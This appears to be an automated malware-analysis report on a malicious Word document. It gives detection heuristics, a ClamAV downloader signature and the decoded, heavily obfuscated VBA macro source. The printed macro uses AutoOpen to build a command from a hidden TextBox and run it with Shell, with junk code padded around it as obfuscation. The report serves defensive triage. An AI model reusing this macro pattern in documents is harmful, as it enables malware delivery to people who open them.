Malware Insights
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers a function that includes a 'Shell()' call, indicating an attempt to execute external commands. This is further supported by the 'SC_STR_CMD' heuristic firing, suggesting 'cmd.exe' invocation. The ClamAV detection 'Doc.Downloader.Valyria-6786377-0' also points to a downloader functionality. The VBA script itself is heavily obfuscated, making it difficult to determine the exact payload or destination, but the intent is clearly to execute a secondary stage.
Heuristics (9)

- ClamAV: Doc.Downloader.Valyria-6786377-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6786377-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:

  ```vba
  Set zAawFTZHtRvwSSfdmmCIn = LwWbRHlRUUNnEVW
  MGTzCD = Array(CSoRWlIz, KqcGTdYsl, dRKsVn, Interaction.Shell(qPOZizzNdMb, oilwju), LanpIm)
  Select Case DTpvpCYqVZJGtbRNPUikYJD
  ```

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:

  ```vba
  Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
  Sub autoopen()
  KvjmLN
  ```

- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11472 bytes |

SHA-256: 81e6adddfa5deec0311a11749143be07f343c99a7533c2147c9bcb5eee7c31fc

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 322 of 358 identifiers look randomly generated (e.g. 'dmIFBbKPACcfzHHwcNpoSSro'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "XwWUkCvKdw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
KvjmLN
End Sub
Attribute VB_Name = "pVATiLJs"
Function KvjmLN()
On Error Resume Next
Select Case YpcNZAEQchnnZOoukcRDc
Case 59714889
zbSjUOfWfQBrub = iDkwWqprCtBRrTob
PpfmHUjCzLHXYXt = Log(WtNTfmKHjQmSwoCqp)
bFvbbjAtYihUdWHzUaaIZciY = 16379562
hRGJJRicvoWvRdSlNfZPmQK = TbPhVzbXYlCjnPVQlAaTcZJw
Case 275353725
OzwmEQGJphBBHvNzWjbiww = 62245508
ilprUuSSrhlbYlj = Log(ddaoPktiGdCcVHpQqpISa)
pvOiKZKlakzqFUXVu = 300764562
LkrrpzjsUljdOKOoiZjaUTU = Log(RdiCUsUuOaPiwE)
End Select
Set kahpArHljqjsvNTXrPo = MThXcQoOnukqaAvAmiU
Select Case cvLcpIcRuUPpOVZnAQ
Case 296878062
VWRiAcwZANwhwm = qbUPSoWUFBphGsmtuSiz
dhcNLDQjVitcsiL = Log(BaOzBMcKuqjNTEOOmWNu)
CHlFnjSwENJaOtrTAEQFRSU = 148580451
MRTfqWVRmwTctO = KOpdWmFKXulRwpbjmPC
Case 175011919
zQOqoJbuXrGqouCcq = 340059039
GHwkEEYcLPhNrnJLz = Log(nidiPzDfbIuYHvPlTLC)
JlQjPfqdPCijEADRncrw = 219980730
dPinHlzGTwIRSBRwPkJ = Log(QYdKTGrwzrTGwjIAwbX)
End Select
Set fIifbniCzrMHnHJ = mXTAtzIcfBSitRz
Select Case pCXfpsNHjzIMZjQ
Case 81885445
RjcYoZlVuHfwJhr = qTfWtFqBujrjbDXkqrBwzkB
lKulhLaPRTiNkqNMtbiI = Log(FtrjvGSjstGRCkiKFTiFc)
HVKzAdoFXGtujQDBm = 32956130
iYabwiFiBnHvCGp = WZvFornVzXIDSHDhdztqjt
Case 93261909
uznRQLroqdjcqzTql = 35541437
YaCMukaREMzGdLdLoEV = Log(ojTMoabqidCFbRp)
snshpunbrXDRNofmPAnrGpX = 127334481
kmaKuiMVmSALoPu = Log(sVQXKdqwQqbdwlDQZYFHMQz)
End Select
Set rvaViaaktwNTGvwGwcuEDiX = OklQKmjcYXjOCU
Select Case hdOcRLSfPrzVbksvZNPkIVIo
Case 72774986
wKUwbHRkvNsqSKC = jvjmBfsNsfwUqL
aRIOIKSPpEqoiCivEh = Log(oMHZHQSHEwJwtks)
ZKwurOfrhKqNLJktn = 239434876
ITsAzqDOTjHzElkJkH = OajQrzZEvuMPJJNkwjJwEo
Case 2575890
KZMmbaAzlAVwbDAD = 157543210
HTGQworBmcbJiaaTFRknc = Log(uNdJnRIufFaSjhGtbY)
anXYcRvVIwiTkIlYtnoAZss = 320933234
iPttNLqLsChXpArrvA = Log(zmqKvIMGmXVhvaCuCCcunsHr)
End Select
Set EBEmwIirwzisFwk = EDnXUmwmGppSGI
Const oilwju = 0
Select Case ERhCdRSiUDVwOhpzjFUPBJH
Case 169610740
XSiQowUzYnJmPSKbpvuXG = KikWsmRpvJHTGzoOjGBBquf
TmJnMOMCbiHzfRDh = Log(isAfwMLnbOoWFDQzZCGd)
djwErbsoiPCTVIBffXZw = 1082192
zYfWaqAGPzDBELDaElSzt = lCjvOUuijfdshXYVACoczEPT
Case 23434182
bETofBrAndnfbfLkRYYLif = 10511315
kQKRzjnPrYtqKrAcAjkvi = Log(aIQPnrvrLvCkEOqaBH)
XnDmUZZYvKwvFAPqCAjswT = 342167560
znZnlmafdFKhXVvp = Log(SAhNzzkpYoaROtDn)
End Select
Set phzmnJkSSAqhTjEtfdTSwz = pzNwzOPLGtjjOqbfqwvhwu
Select Case laMaQKiRYBrniviELjPJvwO
Case 15128343
avnHijwcNilZNitOjicAwicB = cpCuwoLJcpPrJuRsLVN
iwBWuLOlBAwSliBuwhPtZPk = Log(dWanLIlJPIvinfznaaIcsw)
bsWwiFUTOOLtYka = 176313865
PmDdmXHQhcSzHHwhQwuoMHE = ojQbmbCAzONGtcoVPfwdBTH
Case 39933447
LHmfmhHiHoGHfdFaS = 3780049
uqnnJZYjKbtVZKMaUPUMhFX = Log(oiNkCrCjTOLYYTcFNAwHO)
hzSClKznLpSBwaMoi = 131373518
KCKwnCAnPzjIPXWBPRz = Log(slfCVGWUBtZWcjD)
End Select
Set WwfzkWioijCicZwXi = fYXIchfflVZKjjTF
Select Case oMQunjRkqbDphiVhRQNW
Case 302472267
MdiTjQcnqCitVKik = waZiFjzwEScHHEviizmMUzAI
kBGnNKDjSPvUiH = Log(lWbwzjjznKqLrYdzaRcUfqJr)
YbopzOArpbzXCIW = 7152956
TcWzMHpQVCCmSu = kqaEuInwqTBzjbYJ
Case 40768554
bXjVHMTzYiMzEXjjnL = 218940320
GvjjjjKJJowtwTrXh = Log(jOkvkIksOiQwoMcoN)
qApbCKpjhSBljJCYbTjL = 73961734
wnSjsMAkQHGLjhZILaF = Log(aRrczHuPkJHCUS)
End Select
Set BIWRdjzCtfUdVw = HGFLzivpilSkzHzDqN
Select Case NTvQlLPuVNNqkNsL
Case 59025954
makmuOhhElTPdMJizuiahq = rOJSpDzMTpoVjbbYh
DGdaFkBhBPzciJvJtYkvs = Log(EZzZoqcHWVBrdkoQIZRH)
kOrGfZXiDnlqZB = 26400725
jvKFutcbqfLUcPLikbU = HTJQEYThQBDikoci
Case 47217835
IqmQPANCFncHFw = 215559657
TMltAVauKpbcknnjWhTiYrD = Log(DCSfFJvFBqVPsNC)
QrFaYkRSzvkYfCVbJcqwCu = 270124618
tWauSYoJijNjmc = Log(SkAjJZXZzVtFQWEjVCDhC)
End Select
Set XzaHatwoophsYNCO = cVwbYZTXmazrdiuhINBF
Select Case tNPwKTXRszLMlkkWpj
Case 320876281
BcPaBOYRooLCdHPzEW = MwOaJmapNdbckLqVQwovwuFc
mJidVnSSmjanBF = Log(aYLnNLarnmwzPbASrlWXds)
sqJJwbPiOsAUYjRP = 292404703
RvrWnCrmRiBfhKiM = zDBcPYDkGPGbiaWiL
Case 76274269
UWDHRLKjjjKplLQTLqjCXnlj = 253513286
KjIfAWzlrwuwkQFrWBvZV = Log(RGKnbJZhkWUhAbXBi)
qzUUZPGTzfQklMPuRCUNvq = 80596824
MYbCQiTUSHjVvzjv = Log(ILuRzkIRFJVhVtAnKHBoD)
End Select
Set TLvRddtzUVZfmi = sNnSlLUwnzNiilpiG
qPOZizzNdMb = XwWUkCvKdw.TextBox1 + koTBw + HXbMGiw + aKjEYYw + mKQAA + jPjFHibZ + dqVQrUv + zSKLZNV + FzEjq + RGFMkAj + Nhqjzuz + LLTfwDW
Select Case ttibUJmdonljsN
Case 337879738
rWPljwZCzEbnTvTiQLzCDf = PzYiQEEqDtzIdL
TuUcdPhwJtUCQhPwl = Log(TzlIQJwsNYuVnpXA)
CiaBniBOpwBoIowLvKLiLiL = 196252101
CIEoGifPpMOKKjRkubNzE = kzJrfMWjYWwQlZw
Case 173367238
RVYTbhAlittQDwjjzYGiO = 335210110
tIosOuurnTsvbflJQ = Log(FAScPVYQjoAqwUT)
iKnpmrjBFzKCFB = 75848456
qVIwARsSTzKGqzXXc = Log(AaVaWORQWSKVLhclzbL)
End Select
Set CNSUWpjcLIZnajAktP = ujjuaIzmciFzwMHVnIBEjioF
Select Case dIDJCGYdGOndwbiWBtX
Case 254625998
hQkkYWInlIaBNFVmfMiJZ = fDZfRLWroGStvsTYdjQpVFN
jWIjWhtdIpljLtEzRtU = Log(iUJdSGjusjWZqzvvCm)
HNpkGGnNjfTYclttPM = 206472376
PwwkYSMqOzIuiYMGt = DWftzOZLunwDjjXVFJOEM
Case 266483170
wwlWYtEYnAjJIlWwkLNXYtK = 117253007
XITDroWObiuNrARqPID = Log(aOkiKiszQWCoTwBklVvLJujC)
ksLvjJkHSwJYksNvXzF = 210832776
ttzjFtNrqjhiGam = Log(DjNRjBzrMAciQmwbWVqwM)
End Select
Set bPXQbRbpdSbOUNsOZ = tHTERibDjGMljnVoIztQZiP
Select Case VwtMjtChMzTkTrsKbJorL
Case 75191034
zztziraijMPEkmBdNG = budKboCbAdAZVKcvOmvYpmT
YEmIYajakSjbTnSJcQZAjn = Log(uHqmqSiDpbqmXBuCZzZoCaB)
bUlvZMTGkKrBinqICPu = 340216747
AvIiOzDGwrUFOLWjmicI = BNJsUlHRmnfCwaYdNLMPA
Case 251561706
XwTcTbPlSrtziwptNw = 271516442
EpDPkzDYSPsjPumw = Log(JnpWBMKFbqiYRz)
LZOhtDsVXqSDzKjoMs = 296274455
IzqCcsKJGZABQY = Log(pfEDwQRRfiJLurCSfYu)
End Select
Set LjMFAtjOwqRmamtI = pwnriKTTjPREGVd
Select Case TCVQpfdfqzDPwbTUPzZJFvom
Case 71775005
VvHLszJfAIrLCfojBic = obobWNoKpXNiFOJiX
HGGRaKcDztUZtKJtmuGj = Log(iIwpduJFnVGJXWVLWAiwTQ)
pQdDZMcPcqpdwHczPTzJYOP = 146090256
oiQtbhVOOIYzqjtLFdShtX = uDPfVGVbAHQkiM
Case 144536651
ITPjwDwYjEzSkz = 265109345
QiVqMCAHshXrawPzjdJOinE = Log(EqvQICqDTXUzqfoGTHrQjGw)
pwjHoaPdZilVGjwprUYDi = 101565185
EoCvWvnKwsLbKTj = Log(tHqaLtTAjJBZLiuGZ)
End Select
Set fSlfthmUncvIoWIFfvnpzK = CMMtOzPwFCVoQcOOJo
Select Case TStviWQWiMOUCwZcmSoj
Case 240787653
TlhoZbbLfDooOZjVw = lkVRjQoPXQajwit
wINtwpuXhKjNkz = Log(QTjzzvCBRAJDLlwFFvLaaIE)
vqwjYkafYWJMSktG = 320058097
wtnljljFaSYYTIO = BJzSdjZdioblnUBEiU
Case 78585372
YKGMATJIHzDBzzij = 61144326
dPUJHvKzRGRTuwwDwrDl = Log(JXRWikZoplRvAqwqO)
LCDBDrnFEFuBqj = 159752430
UrDncKkJcUzYtIzM = Log(oriPHUZiZfUtnulXpWEna)
End Select
Set ARuZirPLwFhTBppwMXd = CfQPoZNBEmuZHO
Select Case MPlqVQpzdEFHYDEIFzKR
Case 207338704
OliZzcQbMuuhwsbzdHljHrfi = wzLbUIuzPBzHwRNhBs
MrFMjHUDfzpXGABB = Log(EArlzkirbpjpYwGzTVfs)
fUAFOzadtGuPidBAZMHWUF = 116757811
NHAiXmfVIsZjrflmHNhjma = VFwuIYVRZCMsHzsGHbYHqD
Case 138650130
tbUPHXiBnSfdZrWz = 253370844
zdindpPHaHNSzRkpAhE = Log(JBTLFoSOjPFbVOE)
fGzfzzzboUSNtkqosjRzJSh = 269958117
AaKClzkNsJujZGKEsX = Log(WEVwYQipzGhMYIHzZmYCX)
End Select
Set zAawFTZHtRvwSSfdmmCIn = LwWbRHlRUUNnEVW
MGTzCD = Array(CSoRWlIz, KqcGTdYsl, dRKsVn, Interaction.Shell(qPOZizzNdMb, oilwju), LanpIm)
Select Case DTpvpCYqVZJGtbRNPUikYJD
Case 114530357
dcrDIqEoHzPLjYARwDwptDP = oBWbiWuQYDLZhnNjER
bCCfviTZGGbzZNWOGTdKk = Log(znjNakLqNkbSnSm)
azKzoKwDlMLYGPbHAW = 18317151
wiDjOPsqXHZDcjsfz = RpqcbOYmjwJURRPXXsubiY
Case 117824801
jimIwWWvHMENYVG = 266902481
bjthDpHnELAlYEsX = Log(wzbQqMbNNFMCzClFRGsYX)
pfUrKWJiHMqnZJMtlTRU = 276237860
ukEJPjGzAzNTIwwwCFDiz = Log(MMcbsXVZGDnEkj)
End Select
Set BHdbJLqaFBQzmRMQLmtYsj = njcbsJjDLMLAwaCnpVmXZb
Select Case cNtBBTMKqBBajJim
Case 61441752
YTHMzqTOPhKolSODchWlO = FjQLqdCFUKjOaIB
QDinDfzBPiMdhzQXT = Log(NbvlApLJMAFXsGBMRT)
bCajPvHRZYXuMu = 47548956
aUiCsbuTzvsqGbUjwTsQnvj = sYlloFtclLarnQKzHGjTCRL
Case 329547982
rzsBqHfonKUpJi = 300573279
PFuBdsjItIjOMn = Log(MnhzIAbuEvDzFqJwcnR)
MQwawQjIhaRcziHCbjlBoK = 278667076
atbSjKEauAPwqHw = Log(RSNddbzWiHXvCPwBarAFpRZ)
End Select
Set WqhzTLLTiskWzMcwtE = bmIYiCNWzHtCztqHntADX
Select Case tVrEwhkqYTuwzJa
Case 315138231
lURATCDVwhbGIYShBL = NnCivsVwEbLzKKMjz
EaToiCAIkQucRwwHhjjq = Log(IzFwukiRwwsUEwkwZF)
dmIFBbKPACcfzHHwcNpoSSro = 131253524
HNANIIbjMjzsDW = UhPTQvNwzIkjRhLuUlATz
Case 100501160
tUENuXzkKSEzlcUDGuQAFX = 160591779
BBofGDDmFtVzMhSZ = Log(XaQMkZSAitZjOi)
vuMtiRiGPRrrGUrYbr = 329574405
zHwRbWfYJdFqLADRVZqkt = Log(BvshLfrVzpQAYowuRL)
End Select
Set FwmLAjGQaDCANocGBYuLAh = fQaKcPTaHiwnYPjrAEORRv
Select Case GFXVzbWpHrjzSTmI
Case 259586288
GdknQzuUNkkJjiEw = zflLmpTmcSYmRisiVYHZSoY
dNlFzHztTamcCzUnRBo = Log(WivCrfOKzZaLHKhYDNoUU)
SrwPbWETIQAqEvRjNRtn = 315582847
zbUsRvkDMTNrPEGbEsFdRJL = FmGUAXbjjYsUujEIj
Case 32147731
jdMfNclNAhSdpQ = 26907206
fpPDpsjIrLljUnzuMFinsG = Log(rOJawQvCEqwZTTBNnwEoBrE)
NkYQjlQuYwYojRirwJjpYNi = 174234507
rrqoRqAKRNNsiSTa = Log(AWvNhVOMssKOUz)
End Select
Set zGrtaFGFXdOEUzS = NPVMHiwKVcbZwpvzOHvXaZz
Select Case ORInRiaMKpBUnLrq
Case 197334600
iuAIkWVDXzTkXKqDmmifPO = YFhiFimorsPGjKFjmRNH
taRrdkZEHwZPPcDCnPUl = Log(crHEHtjGwNCHCffP)
cwNjjtqqUiCiwBsWTQiKnWr = 295117414
LlXIMwXmwnVXZtzRNmKibzLJ = jOzFDGHUkXIThImfrBOWw
Case 298056509
ltZjjOXOaNXchahthO = 22998073
VpwjiYzkvzmmqrLMiWaFNJ = Log(FJfEEKIjIuDBwvtEIPmSd)
lmqOUOKnzbMHsWzTuZn = 106966854
rmpPRkSSqaqEiYsOqptW = Log(zcpoCWEoUNfNzuAAwD)
End Select
Set sVHBVCOwGFEktuJuKAbP = NdVNLrhisOrmPdzpb
End Function